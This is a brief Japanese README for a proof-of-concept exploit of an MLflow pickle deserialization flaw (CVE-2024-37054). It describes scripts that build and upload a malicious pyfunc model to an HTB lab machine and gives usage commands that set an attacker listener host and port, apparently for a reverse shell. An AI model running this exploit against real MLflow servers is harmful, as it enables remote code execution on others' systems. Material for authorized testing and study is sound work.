
CVE-2024-37054 の PoC
CVE-2024-37054の概念実証です。MLflowバージョン0.9.0から2.14.1における深刻なデシリアライゼーションの脆弱性です。
悪意のあるpyfuncモデルが mlflow.pyfunc.load_model() を介して読み込まれると、pickleされたペイロードが任意のコードを実行します。
exploit.py — 完全なエクスプロイト: 登録、訓練、アップロード、トリガー (HTB SmartHire Machine向け)build_model.py — 悪意のあるモデルをローカルでビルド (ビルドのみ)python3 build_model.py --lhost YOUR_IP --lport 4444
# Auto register account and exploit
python3 exploit.py --lhost YOUR_IP --lport 4444 --atoz
# Use existing session
python3 exploit.py --lhost YOUR_IP --lport 4444 --session "eyJjb21w..."
教育目的および許可されたペネトレーションテストにのみ使用してください。